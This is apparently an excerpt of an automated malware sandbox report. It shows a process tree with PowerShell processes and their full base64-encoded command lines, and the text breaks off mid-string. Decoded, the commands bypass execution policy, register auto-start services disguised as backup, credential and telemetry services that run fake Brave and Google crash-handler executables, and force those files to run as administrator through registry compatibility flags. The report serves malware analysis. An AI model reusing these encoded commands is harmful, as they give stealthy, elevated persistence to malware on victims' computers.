      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIARABlAHYAQQBzAHMAbwBjAE0AYQBuACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIARABlAHYAaQBjAGUAIABBAHMAcwBvAGMAaQBhAHQAaQBvAG4AIABNAGEAbgBhAGcAZQByACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIATgBnAGMAQwBwAG0AcgBTAHYAYwAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIAVABpAG0AZQBSAGEAdABpAG8AUwB2AGMAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAKAAoATgBlAHcALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAIgBTAHAAbwBvAGwAZQByAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBTAHAAbwBvAGwAZQByACAAQQBkAHYAYQBuAGMAZQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUwBwAG8AbwBsAGUAcgAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIAVABlAGwAZQBtAGUAdAByAHkATQBnAG0AdAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIA
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2304
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2944
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss2CBB.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi2C99.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr2C9A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr2C9B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZ